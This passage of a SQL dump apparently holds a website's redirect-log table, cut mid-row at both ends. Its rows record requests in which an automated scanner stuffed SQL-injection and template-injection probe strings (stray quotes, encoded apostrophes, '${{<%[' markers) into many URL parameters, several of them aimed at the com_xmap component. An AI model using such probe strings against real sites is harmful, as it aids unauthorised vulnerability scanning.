00:00:00',301),(23921,'https://ekvatorprint.com.ua/index.php?data=8${{<%[}}%\\&mode=8${{<%[}}%\\&order=8${{<%[}}%\\&lang=8${{<%[}}%\\&p=8${{<%[}}%\\&key=8${{<%[}}%\\&status=8${{<%[}}%\\&start=8${{<%[}}%\\&charset=8${{<%[}}%\\&description=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:02:56','0000-00-00 00:00:00',301),(23922,'https://ekvatorprint.com.ua/index.php?state=8${{<%[}}%\\&query=8${{<%[}}%\\&f=8${{<%[}}%\\&error=8${{<%[}}%\\&save=8${{<%[}}%\\&sort=8${{<%[}}%\\&format=8${{<%[}}%\\&tab=8${{<%[}}%\\&offset=8${{<%[}}%\\&edit=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:02:56','0000-00-00 00:00:00',301),(23923,'https://ekvatorprint.com.ua/index.php?preview=8${{<%[}}%\\&filter=8${{<%[}}%\\&update=8${{<%[}}%\\&from=8${{<%[}}%\\&view=8${{<%[}}%\\&a=8${{<%[}}%\\&limit=8${{<%[}}%\\&do=8${{<%[}}%\\&plugin=8${{<%[}}%\\&theme=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:02:56','0000-00-00 00:00:00',301),(23924,'https://ekvatorprint.com.ua/index.php?dbname=8${{<%[}}%\\&option=8${{<%[}}%\\&userid=8${{<%[}}%\\&sql=8${{<%[}}%\\&options=8${{<%[}}%\\&address=8${{<%[}}%\\&activated=8${{<%[}}%\\&action2=8${{<%[}}%\\&password2=8${{<%[}}%\\&pass1=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:02:58','0000-00-00 00:00:00',301),(23925,'https://ekvatorprint.com.ua/index.php?data=81x\'\'\"%27\\&mode=81x\'\'\"%27\\&order=81x\'\'\"%27\\&lang=81x\'\'\"%27\\&p=81x\'\'\"%27\\&key=81x\'\'\"%27\\&status=81x\'\'\"%27\\&start=81x\'\'\"%27\\&charset=81x\'\'\"%27\\&description=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:01','0000-00-00 00:00:00',301),(23926,'https://ekvatorprint.com.ua/index.php?state=81x\'\'\"%27\\&query=81x\'\'\"%27\\&f=81x\'\'\"%27\\&error=81x\'\'\"%27\\&save=81x\'\'\"%27\\&sort=81x\'\'\"%27\\&format=81x\'\'\"%27\\&tab=81x\'\'\"%27\\&offset=81x\'\'\"%27\\&edit=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:01','0000-00-00 00:00:00',301),(23927,'https://ekvatorprint.com.ua/index.php?preview=81x\'\'\"%27\\&filter=81x\'\'\"%27\\&update=81x\'\'\"%27\\&from=81x\'\'\"%27\\&view=81x\'\'\"%27\\&a=81x\'\'\"%27\\&limit=81x\'\'\"%27\\&do=81x\'\'\"%27\\&plugin=81x\'\'\"%27\\&theme=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:01','0000-00-00 00:00:00',301),(23928,'https://ekvatorprint.com.ua/index.php?dbname=81x\'\'\"%27\\&option=81x\'\'\"%27\\&userid=81x\'\'\"%27\\&sql=81x\'\'\"%27\\&options=81x\'\'\"%27\\&address=81x\'\'\"%27\\&activated=81x\'\'\"%27\\&action2=81x\'\'\"%27\\&password2=81x\'\'\"%27\\&pass1=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:03','0000-00-00 00:00:00',301),(23929,'https://ekvatorprint.com.ua/index.php?option=com_xmap\'&sitemap=1',NULL,'https://ekvatorprint.com.ua/t?r=\'&utm_source=\'&_utm_source=\'&_utm_campaign=\'&_utm_medium=\'&_utm_content=\'','',4,0,'2022-07-22 04:03:10','0000-00-00 00:00:00',301),(23930,'https://ekvatorprint.com.ua/index.php?option=\'com_xmap&sitemap=1',NULL,'https://ekvatorprint.com.ua/t?r=%27&utm_source=%27&_utm_source=%27&_utm_campaign=%27&_utm_medium=%27&_utm_content=%27','',4,0,'2022-07-22 04:03:10','0000-00-00 00:00:00',301),(23931,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=\'1',NULL,'https://ekvatorprint.com.ua/t?r=\'&utm_source=\'&_utm_source=\'&_utm_campaign=\'&_utm_medium=\'&_utm_content=\'','',4,0,'2022-07-22 04:03:11','0000-00-00 00:00:00',301),(23932,'https://ekvatorprint.com.ua/index.php?option=\"com_xmap&sitemap=1',NULL,'https://ekvatorprint.com.ua/t?r=\"&utm_source=\"&_utm_source=\"&_utm_campaign=\"&_utm_medium=\"&_utm_content=\"','',2,0,'2022-07-22 04:03:11','0000-00-00 00:00:00',301),(23933,'https://ekvatorprint.com.ua/index.php?option=com_xmap\"&sitemap=1',NULL,'https://ekvatorprint.com.ua/t?r=\"&utm_source=\"&_utm_source=\"&_utm_campaign=\"&_utm_medium=\"&_utm_content=\"','',2,0,'2022-07-22 04:03:11','0000-00-00 00:00:00',301),(23934,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=\"1',NULL,'https://ekvatorprint.com.ua/t?r=\"&utm_source=\"&_utm_source=\"&_utm_campaign=\"&_utm_medium=\"&_utm_content=\"','',2,0,'2022-07-22 04:03:11','0000-00-00 00:00:00',301),(23935,'https://ekvatorprint.com.ua/index.php?option=1x\\com_xmap&sitemap=1',NULL,'https://ekvatorprint.com.ua/t?r=1x\\&utm_source=1x\\&_utm_source=1x\\&_utm_campaign=1x\\&_utm_medium=1x\\&_utm_content=1x\\','',2,0,'2022-07-22 04:03:12','0000-00-00 00:00:00',301),(23936,'https://ekvatorprint.com.ua/index.php?option=com_xmap1x\\&sitemap=1',NULL,'https://ekvatorprint.com.ua/t?r=1x\\&utm_source=1x\\&_utm_source=1x\\&_utm_campaign=1x\\&_utm_medium=1x\\&_utm_content=1x\\','',2,0,'2022-07-22 04:03:12','0000-00-00 00:00:00',301),(23937,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1x\\1',NULL,'https://ekvatorprint.com.ua/t?r=1x\\&utm_source=1x\\&_utm_source=1x\\&_utm_campaign=1x\\&_utm_medium=1x\\&_utm_content=1x\\','',2,0,'2022-07-22 04:03:12','0000-00-00 00:00:00',301),(23938,'https://ekvatorprint.com.ua/index.php?option=1x\'\'\"%27${{<%[}}%\\com_xmap&sitemap=1',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527${{ource=1x%27\'\"%2527${{1x%27\'\"%2527${{ium=1x%27\'\"%2527${{=1x%27\'\"%2527${{','',2,0,'2022-07-22 04:03:12','0000-00-00 00:00:00',301),(23939,'https://ekvatorprint.com.ua/index.php?option=com_xmap1x\'\'\"%27${{<%[}}%\\&sitemap=1',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527${{ource=1x%27\'\"%2527${{1x%27\'\"%2527${{ium=1x%27\'\"%2527${{=1x%27\'\"%2527${{','',2,0,'2022-07-22 04:03:12','0000-00-00 00:00:00',301),(23940,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1x\'\'\"%27${{<%[}}%\\1',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527${{ource=1x%27\'\"%2527${{1x%27\'\"%2527${{ium=1x%27\'\"%2527${{=1x%27\'\"%2527${{','',2,0,'2022-07-22 04:03:12','0000-00-00 00:00:00',301),(23941,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&title=8\'\'&code=8\'\'&q=8\'\'&submit=8\'\'&user=8\'\'&token=8\'\'&delete=8\'\'&message=8\'\'&t=8\'\'&c=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23942,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&data=8\'\'&mode=8\'\'&order=8\'\'&lang=8\'\'&p=8\'\'&key=8\'\'&status=8\'\'&start=8\'\'&charset=8\'\'&description=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23943,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&s=8\'\'&post=8\'\'&excerpt=8\'\'&login=8\'\'&search=8\'\'&content=8\'\'&comment=8\'\'&step=8\'\'&ajax=8\'\'&debug=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23944,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&state=8\'\'&query=8\'\'&f=8\'\'&error=8\'\'&save=8\'\'&sort=8\'\'&format=8\'\'&tab=8\'\'&offset=8\'\'&edit=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23945,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&preview=8\'\'&filter=8\'\'&update=8\'\'&from=8\'\'&view=8\'\'&a=8\'\'&limit=8\'\'&do=8\'\'&plugin=8\'\'&theme=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23946,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&text=8\'\'&test=8\'\'&path=8\'\'&language=8\'\'&height=8\'\'&logout=8\'\'&pass=8\'\'&dir=8\'\'&show=8\'\'&h=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23947,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&value=8\'\'&filename=8\'\'&redirect=8\'\'&year=8\'\'&group=8\'\'&template=8\'\'&version=8\'\'&subject=8\'\'&m=8\'\'&download=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23948,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&method=8\'\'&uid=8\'\'&tag=8\'\'&category=8\'\'&target=8\'\'&ids=8\'\'&term=8\'\'&new=8\'\'&locale=8\'\'&author=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23949,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&paged=8\'\'&cat=8\'\'&msg=8\'\'&to=8\'\'&add=8\'\'&reset=8\'\'&d=8\'\'&day=8\'\'&nonce=8\'\'&captcha=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:14','0000-00-00 00:00:00',301),(23950,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&output=8\'\'&host=8\'\'&revision=8\'\'&i=8\'\'&xml=8\'\'&db=8\'\'&time=8\'\'&section=8\'\'&image=8\'\'&r=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23951,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&files=8\'\'&tags=8\'\'&users=8\'\'&role=8\'\'&send=8\'\'&fetch=8\'\'&updated=8\'\'&skips=8\'\'&n=8\'\'&check=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23952,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&table=8\'\'&orderby=8\'\'&num=1355857825381625\'\'&import=8\'\'&html=8\'\'&log=8\'\'&prefix=8\'\'&fields=8\'\'&pwd=8\'\'&pid=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23953,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&month=8\'\'&module=8\'\'&parent=8\'\'&cancel=8\'\'&activate=8\'\'&ip=8\'\'&checked=8\'\'&success=8\'\'&field=8\'\'&desc=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23954,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&case=8\'\'&remove=8\'\'&position=8\'\'&location=8\'\'&extra=8\'\'&count=8\'\'&b=8\'\'&rating=8\'\'&pass2=8\'\'&hostname=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23955,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&move=8\'\'&hash=8\'\'&dry=8\'\'&cid=8\'\'&body=8\'\'&src=8\'\'&level=8\'\'&generate=8\'\'&g=8\'\'&folder=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23956,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&dbname=8\'\'&option=8\'\'&userid=8\'\'&sql=8\'\'&options=8\'\'&address=8\'\'&activated=8\'\'&action2=8\'\'&password2=8\'\'&pass1=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23957,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&meta=8\'\'&id=8\'\'&deleted=8\'\'&act=8\'\'&port=8\'\'&e=8\'\'&taxonomy=8\'\'&ref=8\'\'&publish=8\'\'&secret=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23958,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&create=8\'\'&app=8\'\'&rememberme=8\'\'&number=1355858389024027\'\'&country=8\'\'&phone=1355858389024632\'\'&hidden=8\'\'&force=8\'\'&export=8\'\'&sticky=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23959,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&cmd=8\'\'&v=8\'\'&item=8\'\'&part=8\'\'&json=8\'\'&del=8\'\'&base=8\'\'&foo=8\'\'&y=8\'\'&info=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:15','0000-00-00 00:00:00',301),(23960,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&guid=8\'\'&dt=8\'\'&x=8\'\'&load=8\'\'&list=8\'\'&user=8\'\'&menu=8\'\'&blog=8\'\'&link=8\'\'&end=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23961,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&sid=8\'\'&feed=8\'\'&tax=8\'\'&ss=8\'\'&gid=8\'\'&city=8\'\'&spam=8\'\'&all=8\'\'&hh=8\'\'&nsql=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23962,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&mm=8\'\'&rsd=8\'\'&ps=8\'\'&mn=8\'\'&jj=8\'\'&aa=8\'\'&slug=8\'\'&o=8\'\'&note=8\'\'&l=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23963,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&tid=8\'\'&form=8\'\'&down=8\'\'&val=8\'\'&mail=u1574@gmail.com\'\'&fid=8\'\'&back=8\'\'&mod=8\'\'&img=8\'\'&hide=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23964,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&auth=8\'\'&task=8\'\'&zip=8\'\'&mid=8\'\'&next=8\'\'&main=8\'\'&js=8\'\'&lat=8\'\'&find=8\'\'&alt=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23965,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&set=8\'\'&sub=8\'\'&same=8\'\'&rows=8\'\'&aid=8\'\'&vote=8\'\'&site=8\'\'&keys=8\'\'&dest=8\'\'&up=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23966,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&pos=8\'\'&kill=8\'\'&api=8\'\'&z=8\'\'&last=8\'\'&rid=8\'\'&pg=8\'\'&ns=8\'\'&css=8\'\'&what=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23967,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&rank=8\'\'&max=8\'\'&make=8\'\'&days=8\'\'&skin=8\'\'&done=8\'\'&root=8\'\'&go=8\'\'&dump=8\'\'&uri=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23968,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&pw=8\'\'&drop=8\'\'&goto=8\'\'&st=8\'\'&skip=8\'\'&node=8\'\'&type=8\'\'&lng=8\'\'&left=8\'\'&k=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23969,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&fn=8\'\'&flag=8\'\'&copy=8\'\'&line=8\'\'&jax=8\'\'&icon=8\'\'&dl=8\'\'&bid=8\'\'&yes=8\'\'&run=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23970,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&read=8\'\'&post=8\'\'&nid=8\'\'&map=8\'\'&hour=8\'\'&zoom=8\'\'&rs=8\'\'&ok=8\'\'&mark=8\'\'&lid=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:16','0000-00-00 00:00:00',301),(23971,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&full=8\'\'&err=8\'\'&doit=8\'\'&ac=8\'\'&sent=8\'\'&open=8\'\'&doc=8\'\'&args=8\'\'&inc=8\'\'&func=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23972,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&ver=8\'\'&ts=8\'\'&row=8\'\'&raw=8\'\'&qid=8\'\'&old=8\'\'&nick=8\'\'&lon=8\'\'&lock=8\'\'&ext=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23973,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&news=8\'\'&frob=8\'\'&area=8\'\'&aim=8\'\'&vid=8\'\'&unit=8\'\'&opt=8\'\'&job=8\'\'&idx=8\'\'&help=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23974,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&cp=8\'\'&var=8\'\'&tpl=8\'\'&top=8\'\'&sex=8\'\'&rt=8\'\'&rate=8\'\'&get=8\'\'&box=8\'\'&age=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23975,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&word=8\'\'&oid=8\'\'&mac=8\'\'&from=8\'\'&font=8\'\'&eid=8\'\'&dst=8\'\'&demo=8\'\'&cms=8\'\'&as=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23976,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&zone=8\'\'&usr=8\'\'&to=8\'\'&ssl=8\'\'&name=8\'\'&min=8\'\'&logo=8\'\'&by=8\'\'&bg=8\'\'&ban=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23977,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&un=8\'\'&pic=8\'\'&mime=8\'\'&loc=8\'\'&deny=8\'\'&yim=8\'\'&week=8\'\'&sig=8\'\'&room=8\'\'&req=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23978,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&title=8${{<%[}}%\\&code=8${{<%[}}%\\&q=8${{<%[}}%\\&submit=8${{<%[}}%\\&user=8${{<%[}}%\\&token=8${{<%[}}%\\&delete=8${{<%[}}%\\&message=8${{<%[}}%\\&t=8${{<%[}}%\\&c=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23979,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&data=8${{<%[}}%\\&mode=8${{<%[}}%\\&order=8${{<%[}}%\\&lang=8${{<%[}}%\\&p=8${{<%[}}%\\&key=8${{<%[}}%\\&status=8${{<%[}}%\\&start=8${{<%[}}%\\&charset=8${{<%[}}%\\&description=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:17','0000-00-00 00:00:00',301),(23980,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&s=8${{<%[}}%\\&post=8${{<%[}}%\\&excerpt=8${{<%[}}%\\&login=8${{<%[}}%\\&search=8${{<%[}}%\\&content=8${{<%[}}%\\&comment=8${{<%[}}%\\&step=8${{<%[}}%\\&ajax=8${{<%[}}%\\&debug=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23981,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&state=8${{<%[}}%\\&query=8${{<%[}}%\\&f=8${{<%[}}%\\&error=8${{<%[}}%\\&save=8${{<%[}}%\\&sort=8${{<%[}}%\\&format=8${{<%[}}%\\&tab=8${{<%[}}%\\&offset=8${{<%[}}%\\&edit=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23982,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&preview=8${{<%[}}%\\&filter=8${{<%[}}%\\&update=8${{<%[}}%\\&from=8${{<%[}}%\\&view=8${{<%[}}%\\&a=8${{<%[}}%\\&limit=8${{<%[}}%\\&do=8${{<%[}}%\\&plugin=8${{<%[}}%\\&theme=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 